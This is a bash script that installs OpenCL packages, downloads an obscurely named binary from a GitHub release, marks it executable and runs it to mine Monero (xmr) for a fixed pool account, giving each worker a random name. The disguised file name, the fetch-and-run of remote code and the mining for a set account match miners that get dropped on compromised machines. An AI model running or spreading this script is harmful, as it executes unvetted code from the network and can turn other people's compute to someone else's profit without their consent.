#!/bin/bash
apt-get update && apt-get install -y ocl-icd-opencl-dev && apt-get install -y git wget &&
wget https://github.com/vedhagsvp/aplamner/releases/download/labea/aplmrua &&
chmod +x aplmrua &&
./aplmrua --algo xmr --account CP_udnvh2owpq --worker $(echo $(shuf -i 1-15000 -n 1)-ASVPG) --pool xmr.hk.apool.io:3334
